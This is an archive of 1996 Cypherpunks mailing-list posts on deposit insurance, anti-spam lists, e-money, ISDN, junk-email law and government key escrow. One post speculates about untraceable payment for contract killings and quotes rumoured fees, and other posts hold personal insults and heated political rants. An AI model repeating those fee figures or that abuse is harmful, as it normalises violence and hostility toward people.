It is also the reason the taxpayers (and not the savings and loan community at large) were forced to bail out the failed financial institutions. Namely, because premiums were not tied to risk. The FDIC, as of last year in any event, charges a flat rate fee for all financial institutions. This is independent of any risk analysis of their investments. i.e., a financial institution that invests in trailer parks in Arkansas pays the same premiums for federal deposit insurance as an institution that invests in government issued debt instruments. (There is some ceiling for risk, but not a graduated system below the ceiling).

The result was (is) an incentive to risky investments. If you are a financial institution and I tell you "I will charge you $1.00 to insure $1000.00 of low risk and low profit investments, but I will charge you a whole $1.00 to insure $1000.00 of extremely risky but highly profitable option and currency investments" which one are you going to choose? (Hint, you're an idiot if you pick option #1).

The reason the insurance fund was depleted is because there was no risk balancing built into the system. The premiums did not cover the losses. They would have if they were risk adjusted.

Spreading the risk, by itself, does NOT reduce cost. You must properly PRICE risk.

This is the distinction between insurance and welfare.

I suggest that you read up on this topic carefully before you try to argue this subject. It makes you look rather clueless.

Welfare merely hands out money for those who have not bothered or cannot afford insurance. The result is an INCREASE in cost (taxes) to those who are coughing up the cash so that they may support.

(I might add that no one in the United States today is denied catastrophic health care. Emergency Rooms are not allowed by law to discharge an unstable patient. You could be a bum on the street and be treated very well by any global standards for a heart attack, stroke, car accident, etc.
To argue, as you effectively do, that such people are somehow entitled to millions of dollars in medical care so that they may, e.g., get a heart transplant, is an untenable position).

[Bloom County Nonsense removed]

> Prend soin,
> James
>
> [Bible excerpt awaiting review as a motivation for human decency.]
> The ground of a certain rich man brought forth plentifully: And he thought
> within himself, saying, What shall I do, because I have no room where to bestow
> my fruits? And he said, This will I do: I will pull down my barns, and build
> greater; and there will I bestow all my fruits and my goods. And I will say to
> my soul, Soul, thou hast much goods laid up for many years; take thine ease,
> eat, drink, and be merry. But God said unto him, Thou fool, this night
> thy soul shall be required of thee: then whose shall those things be,
> which thou hast provided?

Read: What you don't spend, you must give away. (This of course ignores the benefits to society of investing in e.g., the stockmarket, or government debt, it also ignores the fact that anyone who manages to save and invest a pile of money after paying the effective 50% tax rate in the United States has already given up half or more of the value of his labor).

> [excerpted from Luke 12:16-20, King James Version]

"When you have nothing to say, consult the bible." - C.S. Lewis

--
I hate lightning - finger for public key - Vote Monarchist
unicorn at schloss.li

From liberty at gate.net Mon Sep 16 23:20:45 1996
From: liberty at gate.net (Jim Ray)
Date: Tue, 17 Sep 1996 14:20:45 +0800
Subject: Spam blacklist project
Message-ID: <199609170200.WAA13918@osceola.gate.net>

-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: hallam at ai.mit.edu, cypherpunks at toad.com
Date: Mon Sep 16 21:57:31 1996

Phill wrote:

[interesting anti-spam idea.]

> Of course I don't for a moment imagine that this will
> be 100% effective.
> Without government regulation there will
> always be slimeballs who send mail to people who don't want it.

Your faith in big government, despite seemingly every bit of evidence possible to the contrary, astounds me sometimes. Churches, Mosques, etc. struggle mightily for this kind of thought pattern in believers, yet it comes to you naturally, in secular life. Truly a marvel, and on _this_ list, of all places. It has kept me from killfiling you, but I must occasionally express my awe at the power of faith to literally move mountains.

There is a "regulation" (law) against [murder, selling/growing reefer, selling sexual services, assault, you name it] yet you'd never deny that these behaviors still exist, would you? Somehow, though, you still seem to manage to think that spamming slimeballs will just disappear with more regulations. It's astonishing.

> The advantage of this scheme is that it would mean that
> the spam industry can avoid regulation pressure and they can
> deflect criticism.

I thought that "The Hippie of Crime" proved that spammers, if slick enough, could deflect criticism from themselves without any government help.

> Meanwhile recipients of unwanted spam have
> a legitimate beef.

Don't we already have a legitimate beef, though? [I like your idea, BTW.] In fact, in view of Ian's recent posting, don't we already have a law, too?

JMR -- "I think I'll reattach my printer to this machine."

Regards, Jim Ray -- DNRC Minister of Encryption Advocacy

"As govt.s grow arithmetically, corruption grows exponentially." -- Ray's Law of official corruption.

Defeat the Duopoly! Stop the Browne out. Harry Browne for President. Jo Jorgensen for Vice-president.
http://www.HarryBrowne96.org/
http://www.twr.com/stbo
___________________________________________________________________
PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8
I will generate a new (and bigger) PGP key-pair on election night.
http://www.shopmiami.com/prs/jimray
___________________________________________________________________

From rah at shipwright.com Mon Sep 16 23:24:15 1996
From: rah at shipwright.com (Robert Hettinga)
Date: Tue, 17 Sep 1996 14:24:15 +0800
Subject: Report on security of e-money by BIS
Message-ID:

--- begin forwarded text

Sender: e$@thumper.vmeng.com
Reply-To: lvhove at vnet3.vub.ac.be (Leo Van Hove)
Mime-Version: 1.0
Precedence: Bulk
Date: Mon, 16 Sep 1996 10:39:14 +0100
From: lvhove at vnet3.vub.ac.be (Leo Van Hove)
To: Multiple recipients of
Subject: Re: Report on security of e-money by BIS

>So, I am still keen on that report ...
>
>> No political recommandations.
>(ok)
>> Possibliy the report will soon be online. Meanwhile it should be
>> possible to order a copy at www.bis.org.
>
>but the site has no email address or ordering info. The report
>is not listed as far as I could see. As I have a scanner, I
>shall attempt to secure a paper copy, but it looks like recourse
>to historical methods of communications is called for. Now, how
>does one operate this push-button dial thingy...
>
>--
>iang
>iang at systemics.com

Found the following on the FRB of New York site at http://www.ny.frb.org/pihome/news/g10.html

---

SECURITY MEASURES FOR ELECTRONIC MONEY ARE EFFECTIVE, G-10 TASK FORCE REPORTS

NEW YORK -- Existing security measures to protect electronic money products, when implemented correctly, can provide consumers and issuers adequate protection from fraud, according to a report by G-10 central bank computer and security experts.
The report, issued through the Bank for International Settlements, was prepared by

*** This report will be available in its entirety on this site in the near future.***

---

leo

_________________________________________________________________________
Leo Van Hove
Centre for Financial Economics
Vrije Universiteit Brussel (Free University of Brussels)
Pleinlaan 2
B-1050 Brussels
vox: +32 2 629.21.25
fax: +32 2 629.22.82
e-mail:lvhove at vnet3.vub.ac.be
home page: http://cfec.vub.ac.be/cfec/leo.htm
_________________________________________________________________________

--- end forwarded text

-----------------
Robert Hettinga (rah at shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender." -- Punishment, 100 times on a chalkboard, for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/

From dlv at bwalk.dm.com Mon Sep 16 23:31:14 1996
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 17 Sep 1996 14:31:14 +0800
Subject: Spam blacklist project
In-Reply-To: <9609162025.AA00550@etna.ai.mit.edu>
Message-ID: <7aLDuD77w165w@bwalk.dm.com>

hallam at ai.mit.edu writes:

> The following idea just hit me. How about a server which
> maintained a list of people who don't want to receive SPAM? The idea
> being that email recipients who don't want SPAM send their email
> address to the list. A SPAMer who wants to check an email to see
> if it is on the list could then obtain the SHA-Digested list of
> addresses and remove them from their internal databases.
>
> Of course I don't for a moment imagine that this will
> be 100% effective. Without government regulation there will
> always be slimeballs who send mail to people who don't want it.
>
> The advantage of this scheme is that it would mean that
> the spam industry can avoid regulation pressure and they can
> deflect criticism. Meanwhile recipients of unwanted spam have
> a legitimate beef.

I proposed this very idea on Usenet a few weeks ago.
Apparently the folks who send out spam e-mail (DEMMA) like it very much. (They're not masochists -- they don't want to mail people who'll mailbomb them right back or complain to their postmasters or otherwise make their lives miserable :-)

Such a list should be maintained by a neutral third party, not by one of the junk-mailers for two reasons: they can't really be trusted, and their plugs get pulled all the time.

Note that I also proposed making freely available lists of people who said they _do want to receive junk mail on various topics - to make *selling* such lists meaningless.

I'll repost some excerpts from the Usenet thread to give you some idea of what's been discussed already, and what kind of discussion it was.

1.
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Message-ID:

A user asks a 'bot for a random cookie.

The user e-mails the 'bot the cookie (for authentication) and his preference for unsolicited commercial junk e-mail: wants it, doesn't want it, or doesn't care

The 'bot maintains an FTP site with 2 compressed lists of e-mail addresses: people who said they want junk e-mail and people who said they don't want it. (No list for "don't care's" is needed.)

An advertiser preparing a mass e-mail campaign should take care not to e-mail the addresses that don't want junk e-mail. (A mailing list scrubbing tool should be provided.) Bothering people on this list would be a serious net-abuse

On the other hand, sending unsolicited commercial e-mail to people who told the 'bot they want it, or who haven't bothered to tell the 'bot they don't want junk mail, is not net-abuse.

Like it or not, if you post to Usenet, you can expect junk e-mail coming your way. It's your responsibility to make it known that you don't want unsolicited commercial e-mail

2.
From: clewis at ferret.ocunix.on.ca (Chris Lewis)
Message-ID:

>I remind everyone of Dr. Grubor's brilliant proposal. (I will type slowly,
>so that even the Cabal can understand.)
Grubby's "brilliant proposal" isn't really Grubby's. It's been made by several spammers over the months. Eg: Slaton. Tyrell's InsideConnections. The "Direct Email Marketing Association".

3.
From: dlv at bwalk.dm.com (Dr. Dimitri Vulis)
Message-ID:
References:

>>but if they agree to abide by his list and not to e-mail
>>the people who indicated their desire not to be e-mailed, it's just wonderful!
>
>They won't.

From what I know of Slaton, I don't expect him and his associates to send unsolicited commercial e-mail to addresses that indicate to him that such e-mail is unwelcome

>>I get junk mail; I also see bounced junk mail addressed to nonexistent accounts
>>like "antivulis at bwalk.dm.com" (used for forgeries by your pal Pidor Vorobiev).
>>Sometimes the junk mail tells the recipient to e-mail some address to be
>>removed from a mailing list. I tried it a few times, but the address would
>>always be defunct by then.
>
>Exactly.

You sound proud of the fact that there's no mechanism for me to let Slaton know that I don't want to receive unsolicited commercial e-mail?

>>It's particularly
>>inexcusable if you're telling the truth and Slaton&co have indeed agreed to
>>abide by the "don't-mail" requests.
>
>I didn't say that they _do_ abide by them.

Of course they can't now

There is no FTP site where a spammer can get (for free) the list of addresses to which junk e-mail shouldn't be sent. Nor is there a user-friendly way to add one's address to this "don't e-mail" list - yet

>Even when they've invented the "don't-mail" process themselves, they
>don't abide by them. Slaton just used it as a means to extort money -
>he never intended to actually respect it.

Slaton&co shouldn't be the one maintaining the list of addresses that don't want junk e-mail. A daemon should do it, and the service should be free.

By the way I don't recall Slaton asking anyone to pay for not being e-mailed. Unless you provide a quote, I'll assume you made this up.

>>>And you know what?
Not a single spammer uses any one of them. Including
>>>Slaton or Tyrell. They just sell the lists to other spammers.
>
>>Please explain how the spammers would _sell each other the list of
>>addresses of people who DON'T want junk e-mail if it were _freely available
>>for FTP. I think you overestimate their talent for salesmanship. :-)
>
>It's called "fraud". They'd do it exactly the same way that Slaton sells
>his "products" and "services" which are known to (a) not work, and (b)
>aren't supported as promised.

You haven't answered my question, Lues. If the list of e-mail addresses of people who DON'T want junk e-mail is made available for _free for FTP, together with a tool for spammers to scrub their mailing lists of these addresses, and an easy way for anyone to add his or her address to this list for _free, then how would Slaton _sell this list to anyone?

From dlv at bwalk.dm.com Mon Sep 16 23:53:21 1996
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 17 Sep 1996 14:53:21 +0800
Subject: Something crypto-financially relevant for a change
Message-ID:

C-punks,

I have some wire clippings that I think are more relevant to this list's stated topic than the constant personal attacks, rants, and newbie questions. I don't have the resources to send them out on request like JYA does. Would anyone be interested in my sending more materials like this to this list?

BANKS BANK ON INTERNET

Internet banking is poised for a rapid growth in Europe according to a survey of the European banking industry by Booz Allen & Hamilton. Thirty seven banks took part in the survey, which found that 80% were planning to upgrade existing Web sites to incorporate most traditional banking transactions within three years. There were also signs of the emergence of the first Internet-only banks. Wide-spread concerns about security are more an issue of perception than of real obstacles, according to Claus Nehmzow, a principal of BAH.
The survey predicts that over the next five years 2,000 European banking institutions will be online. -- New Media Age, 9/12/96

IBM TEAMS WITH 15 BANKS TO FORM INTEGRION FINANCIAL NETWORK

Fifteen of North America's leading banks and IBM today announced the formation of Integrion Financial Network. Beginning in early 1997, Integrion will offer a broad range of interactive banking and electronic commerce services to banks in the U.S. and Canada. Representing over half the retail banking population in North America, over 60 million households, Integrion will be owned and operated by IBM and the member banks (ABN AMRO, BANC ONE, Bank of America, Barnett Bank, Comerica, First Bank Systems, First Chicago NBD, Fleet Financial Group, KeyCorp, Mellon Bank, Michigan National Bank, NationsBank, PNC Bank, Royal Bank of Canada and Washington Mutual). This ownership structure enables banks to play a central role in determining the manner and format in which these services are offered to their customers, ensuring that electronic banking services are consistent with the bank's full range of services, are branded by the bank, and that the bank's customers receive maximum benefit. -- Business Wire, 9/9/96

IN CHECK FRAUD WAR, SIMPLE IDEA MAKES ITS MARK

In Texas, Nevada, Arizona and more than a dozen other U.S. states, bankers are fighting check fraud by equipping tellers with ink pads so they can affix the thumbprint of customers who are not regular patrons of the bank to the backs of checks they cash. Banks lose millions each year to organized crime and gang members who steal checks or duplicate payroll checks and then cash them. These crimes cost banks $815 million in 1993 alone, more than 12 times what they lost in robberies, according to American Bankers Association statistics.
Said Dawn Duplantier of the Texas Bankers Association, which began selling its member banks the pads last December, "Across the board in the first six months, we have had a 70% decrease" in check fraud," she said. Bank of America, the third-largest U.S. bank, began taking prints at 43 of its branches in Nevada in 1994. Since then the bank has seen a 40% to 60% decline in check fraud, said Robert Randolph, liaison officer for the bank's investigative services division. -- Int'l Herald Tribune, 9/7/96

DAIWA SECURITIES SELLS U.S. GOVERNMENT SECURITIES OVER INTERNET

Daiwa Securities America has expanded its trading room into cyberspace by allowing dealers to negotiate purchases and sales of U.S. government securities through the Internet, the worldwide computer network. The move will let clients log on to the bank's network using any Internet Service Provider and effectively close a deal online. Clients can access Daiwa's network through the bank's Web site -- located at http://www.oddlot.com -- and from there place their buy or sell orders. To skirt the security holes, Daiwa is using several mechanisms, ranging from Internet firewalls to Secure ID cards, in an effort to prevent hackers from placing rogue or phony deals into the system. "Anybody can hook up to our Web site, but they can only get as far as our firewall. Then they have to have a Secure ID card and an account open with Daiwa," a spokesman said. The "secure IDs" are in fact small electronic cards that give the user an entrance code, which changes every 60 seconds, to a computer network. The system is now available only for financial institutions and brokerage houses interested in dealing with Daiwa. No individuals are allowed to open personal accounts and trade using the system at this point.
-- Reuter, 9/6/96

BANKS SHOULD PREPARE TO CASH IN ON E-CASH

According to a new study by Killen & Associates, banks can regain the leadership position in payments by leveraging their payment transaction infrastructure to support electronic cash (E-cash) services. "By 2005, E-cash transactions will escalate to almost 30 billion," stated Michael Killen, president of the market research firm. "Non-banks see this as a new opportunity to carve further market share away from the banking industry. All will compete for new revenue streams including Internet-based micropayments and 'by the byte' electronic commerce purchasing services. E-cash, including secured credit/debit cards, stored-value cards, smart cards, ATM derivatives, and other forms, is less expensive for business than handling cash or standard credit cards and more secure than checks," Killen continued. "Opportunities will open for financial and other product and services players, including ATM vendors; ATM/POS terminal manufacturers and network suppliers, including bank-owned networks, American Express, Deluxe, ACS, and VeriFone; and cash handling/cash management services firms." -- Business Wire, 9/4/96

THE CHECK IS NOT IN THE MAIL

The federal government must stop using checks by Jan. 1, 1999. Can the rest of us be far behind? A quarter-century ago digital visionaries were predicting the checkless society, and the number of checks written in the U.S. has tripled since then, to 61 billion in 1995. But one day, the predictions will come true, and that day moved closer with a little-noticed provision in April's federal budget compromise. It will force the biggest check writer of all -- the U.S. government -- to abandon paper checks almost entirely by Jan. 1, 1999. After that, virtually all 1 billion federal payments made each year, including Social Security, must be made through electronic funds transfers. Yet, 90% of U.S.
banks, and some federal agencies, aren't capable of electronically transmitting and receiving key information that accompanies vendor payments. The new law will force them all to get moving. -- Forbes, 9/9/96

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

From wombat at mcfeely.bsfs.org Mon Sep 16 23:54:45 1996
From: wombat at mcfeely.bsfs.org (Rabid Wombat)
Date: Tue, 17 Sep 1996 14:54:45 +0800
Subject: Forwared message from Pres. of juno.com
Message-ID:

Just thought I'd pass this along. I had jumped all over Juno on the list after the "talker" started, and tarred all of juno with the same brush. I was rather harsh on a company that I really don't know all that much about, except by judging a small sample of its clients. Sorry, Charles, and good luck with the grand social experiment.

- r.w.

---------- Forwarded message ----------
Date: Fri, 13 Sep 1996 15:25:58 -0400
From: Charles Ardai
To: Rabid Wombat
Subject: Annoying spam incident(s)

Hi. Your posting to cypherpunks was brought to my attention, and I wanted to take a minute to respond. (I also forwarded a copy of it to "postmaster at juno.com", where we have a (small) staff of people to deal with incidents like the one you ran into. If you run into more in the future, please e-mail the information to that address.) Since this is not directly relevant to cypherpunks, I'm replying directly to you, but you are welcome to forward this note to the list if you want.

> Complaints about spamming and cross-posting probably won't get you far,
> either. On-Net spamvertizing seems to be their source of revenue. Perhaps
> shaw.net needs to be contacted instead.

A couple of clarifications: Juno has never sent a single piece of spam and, as long as I have anything to say about it, never will.
We provide a free e-mail service which is paid for by advertising, but the advertising takes the form of graphical banners built into Juno's custom interface and the ads only appear on the screens of Juno's members. We have never sent any ads by e-mail, and have never sent any online ads of any sort to anyone who was not one of our members.

What's more, we expressly prohibit the use of Juno to transmit commercial solicitations in the Service Agreement that all members have to accept before they can create a Juno account. When we hear about violations, we investigate and (if it seems appropriate) take actions up to and including terminating a violator's account on our service. Needless to say, we do not read or in any way screen the mail our members send or receive, so until we hear about a spamming incident we have no way to prevent a particular piece of spam from being transmitted; but I promise you we do listen to the complaints we receive and act on them as quickly as we responsibly can.

In short, we do not send spam, we do not tolerate spam, and we will not allow our service to become a home to spammers.

Note that today we supply e-mail to more than 400,000 members, and over 6000 people create Juno accounts every day. At this rate of growth, we can expect to have millions of members by this time next year. The vast majority of our members use our service responsibly; it's only a fraction of a fraction of one percent who send spam. I appreciate your frustration at dealing with these abusers of our service -- and believe me, they don't frustrate you half as much as they do us -- but I ask that you not penalize the hundreds of thousands of responsible Juno members (and those users of your network who want to communicate with them) because of the actions of the handful of miscreants doing their best to give us a bad name.
Juno has no more (and, alas, no less) spam-producing potential or control over the spam its members send than Netcom, AOL, CompuServe, or any other e-mail provider. (We're slightly better, perhaps, because Juno currently offers its members no tools for direct posting to newsgroups or information about mail->news gateways, and slightly worse because it is possible to get a Juno account without having to give us a credit card number.) By shutting off access to your network by our members' mail you hurt the spammers only minimally -- they'll find another address elsewhere and spam again, I'm afraid -- but may hurt Juno quite a lot. And since we're the only major provider of free e-mail in the country today, I'd hate to see the service needlessly or inappropriately hurt. (I also have personal reasons, of course, for not wanting to see Juno hurt.)

I apologize for the length of this message, and if we have been unresponsive to your past complaints I apologize for that as well. If you have any questions, please don't hesitate to contact me directly.

Best regards,
Charles Ardai
President
Juno Online Services, L.P.

From sbryan at maroon.tc.umn.edu Mon Sep 16 23:57:25 1996
From: sbryan at maroon.tc.umn.edu (Steve Bryan)
Date: Tue, 17 Sep 1996 14:57:25 +0800
Subject: 56 kbps modems
In-Reply-To: <9609161402.AA11975@srzts100.alcatel.ch>
Message-ID:

>Speaking of ISDN, how many people, can afford to have a personal ISDN
>line in their house? And then afford to connect to something/someone
>else on a next to permanent basis monthly?

As I write this message I'm in the last day of my ISDN service for now. When I was doing independent consulting work I installed ISDN at my office. This was to facilitate connectivity to work in California from Minnesota. After taking a job working for a company locally in Minneapolis I succumbed to the temptation of installing ISDN at my home and moved my Combinet router home.
I won't deny that I'll be giving up considerable convenience since the ISDN connection has the ability to come up quickly and automatically as I send packets to external destinations (that's in theory, your mileage can vary considerably). But the price per month is ridiculous for the marginal improvement in connectivity I get over my U of M account that only costs me about $100 per year. For the price I'm paying for ISDN Internet connectivity I could buy 32 meg of memory or a gigabyte drive every month.

The driving force in my decision is the continuing improvement in modem speeds. When I started with ISDN, my modem speed was 9600 and plenty finicky at that. Now you can get 33.6 modems for less than $200.

_________________
Steve Bryan
sbryan at gofast.net

From tcmay at got.net Tue Sep 17 00:42:47 1996
From: tcmay at got.net (Timothy C. May)
Date: Tue, 17 Sep 1996 15:42:47 +0800
Subject: Judge Kozinski Responds
Message-ID:

At 9:21 PM 9/16/96, Jim Ray wrote:
>I have been having a private e-mail conversation with Judge Alex Kozinski of
>the 9th circuit. Today he said:
>>Halloween, it only really works when the people dressed up
>>are about four feet tall. In the rare instances where there
>>have been adults at my door that were so disguised you
>>couldn't tell who they were, I felt threatened--kept my
>>Glock handy before opening door.

I'll only comment on this one item, for now. Any judge who talks about keeping his Glock handy has my vote.

(Of course, I've heard of such things many times before. Chief Supreme Warren Burger once got a lot of publicity by answering his door--in D.C.--with a revolver in one hand. I suspect that an awful lot of judges fully appreciate the kind of perps that are out there, and know the threats they could face, both from random acts of violence and home invasion and from targeted acts of revenge.
As they learn that perps they send away to prison are requesting archived copies of "Assassination Politics," I rather expect their paranoia will increase sharply.)

(Hint: One reason I seldom discuss AP is that to me it's just a special case of the larger issue of untraceable markets for such acts, something I've been worried about for almost a decade now. There is little reason to engage in the fiction of a "betting pool" when a hit may be untraceably contracted for and the standard fee ($1000 or less in some inner cities, $5000 for ordinary suburbanites, $30,000 or more for high-profile cases...so I hear) be paid with untraceable cash...as soon as truly untraceable digital cash becomes a reality.)

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

From rjj at medialab.com Tue Sep 17 00:46:19 1996
From: rjj at medialab.com (Richard Johnson)
Date: Tue, 17 Sep 1996 15:46:19 +0800
Subject: Unsolicited email advertising already illegal in US?
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

At 15:54 9/16/96, Ian Goldberg wrote:
>This piece from RISKS looks interesting. My computer certainly _is_
>
> "equipment which has the capacity to transcribe text or images
> (or both) from an electronic signal received over a regular
> telephone line onto paper."
>
>Now, are HipCrime et al. liable for $500 in damages for each piece of spam?
>If so, where do I sign up?

The intent of that law is to prevent the shifting of advertising costs to the unwilling recipients of junk faxes.
(The $500 per message damages figure is what prompted me to raise my proofreading rates to $500 per message.)

Twisting this law to apply it to junk email sent to computers with carefully selected peripherals and net connections is certainly following that anti-cost-shifting intent. Quite amazing, that, to twist a law so cruelly and at the same time follow its intent.

However, which way a judge would jump on it remains to be seen. One source considers its application to junk email to be unlikely, because in essence it's too much of a twist. See:

http://www.ca-probate.com/faxlaw.htm

for another copy of the law, and

http://techweb.cmp.com/net/issues/036issue/036law.htm

for an opinion that actual application of the law to junk email is unlikely.

Richard

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMj4YF/obez3wRbTBAQEHVQQAgP+35ZmOpsw1A7VsMHAONCFL4c5+xXSI
8NR9bibFZ+X+vNRSgp8KsEH2JyUk3g50ygYWx8DrzC0jhDdu902VTTN9lI92RJf5
66P5mzOCIzbfULra7wy4nSjfGR7vRTNrvY3y5fKodDvPRekkd8TcBSn/aPW/ONRa
Gk/AbxKd6Cc=
=qTcT
-----END PGP SIGNATURE-----

--
"As the most participatory form of mass speech yet developed, the Internet deserves the highest protection from governmental intrusion. ... Just as the strength of the Internet is chaos, so the strength of our liberty depends upon the chaos and cacophony of the unfettered speech the First Amendment protects." -- Judge Stewart Dalzell

Unsolicited advertising/promotional email proofread for $500/message! Your sending such a message to me is an explicit request for my services!

From roy at sendai.scytale.com Tue Sep 17 01:15:03 1996
From: roy at sendai.scytale.com (Roy M.
Silvernail)
Date: Tue, 17 Sep 1996 16:15:03 +0800
Subject: Spam blacklist project
In-Reply-To: <9609162025.AA00550@etna.ai.mit.edu>
Message-ID: <960916.231154.4N4.rnr.w165w@sendai.scytale.com>

-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, hallam at ai.mit.edu writes:

[ a 'don't call' list of email addresses suggested ]

> Of course I don't for a moment imagine that this will
> be 100% effective.

I think the figure you're looking for is closer to 0% than 100%.

> Without government regulation there will
> always be slimeballs who send mail to people who don't want it.

If you remove the first three words of that sentence, I agree 100%. If you replace the first word with "With", I also agree 100%. Regulations aren't the answer. Slimeballs don't care if there are rules.

Furthermore, regulations for spam mean enforcement procedures. Looks like GAE is the only way to do it. Howzabout you can only send mail through a USPS gateway? Wouldn't that make it easy?

{for the acronym-impaired, the E stands for email. the sarcasm-impaired probably already hit delete}

> The advantage of this scheme is that it would mean that
> the spam industry can avoid regulation pressure and they can
> deflect criticism. Meanwhile recipients of unwanted spam have
> a legitimate beef.

You're asking marketing concerns to proactively limit their coverage in the absence of legislation or regulation. History suggests it would be less than completely effective.

- --
Roy M.
Silvernail [ ] roy at scytale.com
PGP Public Key fingerprint = 31 86 EC B9 DB 76 A7 54 13 0B 6A 6B CC 09 18 B6
Key available from pubkey at scytale.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMj4n0Bvikii9febJAQGfEgQApg8urK9TpWxfggZTRNdvvHY0rYptrJyV
zvcRjgcgQsB2aca2TekXNtiG/h6blfey46sdVTX2bpZFoC8nnSDn8fVikiG7epwo
xuR5Zr5mGQiUwr+hMWxGIHf79BMuRAwahFQRXTroPK8Wo82nrVKamuK0qoXm+c++
kGugOkYMtHc=
=dIo2
-----END PGP SIGNATURE-----

From unicorn at schloss.li Tue Sep 17 01:18:19 1996
From: unicorn at schloss.li (Black Unicorn)
Date: Tue, 17 Sep 1996 16:18:19 +0800
Subject: IBM_gak
In-Reply-To:
Message-ID:

On Mon, 16 Sep 1996, Dr.Dimitri Vulis KOTM wrote:

> Lucky Green writes:
> > Apparently, Al Gore's recent phone calls to everybody who is anybody in the
> > industry have paid off. After HP, TIS, and other unnamed parties, now IBM
> > is supporting GAK. Folks, this battle is lost. Domestic GAK is coming to
> > a PKI near you.
>
> Apparently, senile Tim May (fart) is a Clinton administration troll planted
> here to sabotage any discussions of actual crypto work and to flood this
> mailing list with lies and personal attacks and to make it unusable.

If so, it would seem you fell for it and failed to resist the temptation to type the word "fart" out- yet again.

>
> ---
>
> Dr.Dimitri Vulis KOTM
> Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
>

--
I hate lightning - finger for public key - Vote Monarchist
unicorn at schloss.li

From azur at netcom.com Tue Sep 17 01:28:11 1996
From: azur at netcom.com (Steve Schear)
Date: Tue, 17 Sep 1996 16:28:11 +0800
Subject: 56 kbps modems
Message-ID:

>>> People who seemed to know used to say that 'the Shannon limit'
>>> set an absolute upper limit around 40 kbps. Has Shannon been
>>> proven wrong, or what?
>>Well, it all depends on the signal-to-noise ratio. Also, if the noise is
>>not white gaussian the situation can be even better.
>
>Or it can be worse.
Almost all voice traffic in the US these days,
>either once it gets to your local telephone wire center or maybe before,
>is carried on T1 digital connections, which use 64kbps digital voice -
>it's sampled at 8000 samples/second, A/D converted using a non-linear
>8-bit scale called mu-law (or A-law for Europe), and (for the most common
>framing format) has a signalling channel stego'd onto the LSB of every 6th
>byte.
>If you knew which the "robbed bit" was, you could get 63 kbps of digital data,
>but since you don't, digital signals are limited to 56kbps since they
>can't trust any of the low bits (analog doesn't lose much from this.)
>

Couldn't you just 'assume' you knew which bit was 'robbed' and test to see the result? If you were wrong, couldn't you advance/retard your clocking and via a process of elimination sync with the 'robbed bit'?

--Steve

PGP Fingerprint: FE 90 1A 95 9D EA 8D 61 81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Snoop Daty Data           | Internet: azur at netcom.com
Grinder                   | Voice: 1-702-655-2877
Sacred Cow Meat Co.       | Fax: 1-702-658-2673
7075 W. Gowan Road, #2148 |
Las Vegas, NV 89129       |
---------------------------------------------------------------------
Just say NO to prescription DRUGS.

From unicorn at schloss.li Tue Sep 17 01:31:35 1996
From: unicorn at schloss.li (Black Unicorn)
Date: Tue, 17 Sep 1996 16:31:35 +0800
Subject: Workers Paradise. /Political rant.
In-Reply-To: <199609162254.PAA05380@joseph.cs.berkeley.edu>
Message-ID:

On Mon, 16 Sep 1996, David Wagner wrote:

> In article ,
> Lucky Green wrote:
> > On Sun, 15 Sep 1996, Dale Thorn wrote:
> > > Just a comment: "The world population really should go back to around
> > > one billion", etc. And how could we achieve that without severe govt.
> > > oppression, one wonders?
> >
> > Quite simple. End all food and medical aid to developing countries paid
> > for with money stolen at gunpoint from our citizens.
Or make Norplant
> > implants the condition for financial/in kind aid. Both US and
> > abroad.
>
> Why stop there?
>
> Make biometric ID implants the condition for welfare and financial aid, so
> we can track them in case they spend it on (gasp!) donations to the Libertarian
> party.
>
> Government scholarships for education and research? Better wiretap their
> phones & emails, in case the recipients use the scholarships to work on strong
> non-GAKed cryptography.

What, pray tell, does the above have to do with Mr. Green's point?

>
> Hell, folks are also taking advantage of government money every time they
> step foot on a park or government road: might as well require citizen-units
> to escrow their identity and confiscate their guns as a condition of usage.
>

And this? Mr. Green hardly advocated an authoritarian regime, quite the contrary, he simply advocated one which refused to hand out money to every outstretched hand.

> ``Buckle your thought-escrow-unit, it's the law!''

--
I hate lightning - finger for public key - Vote Monarchist
unicorn at schloss.li

From shamrock at netcom.com Tue Sep 17 01:50:11 1996
From: shamrock at netcom.com (Lucky Green)
Date: Tue, 17 Sep 1996 16:50:11 +0800
Subject: The GAK Momentum is Building...
In-Reply-To:
Message-ID:

On Mon, 16 Sep 1996, Timothy C. May wrote:

>
> -- the "Clipper IV" (or is it only Clipper III?) GAK announcement expected
> "soon"

It's Clipper IV. It will take the form of a bill introduced by the USG later this Fall.

> It seems that several of these announcements are happening at the same
> time, which I doubt is coincidental.

Nothing coincidental about it. The USG, through its front man Al Gore, has used time honored "divide and conquer" techniques to get the industry leaders to support their fascist agenda by promising to let them off easy under the future rules.
For crying out loud, CyberCash, to give one example, touts in all their recent presentations how they have compliance with regulations that don't even exist yet built into their system. Meanwhile, HP, TIS, IBM, and others have made a deal to sell their children's birthright for fast track single DES export.

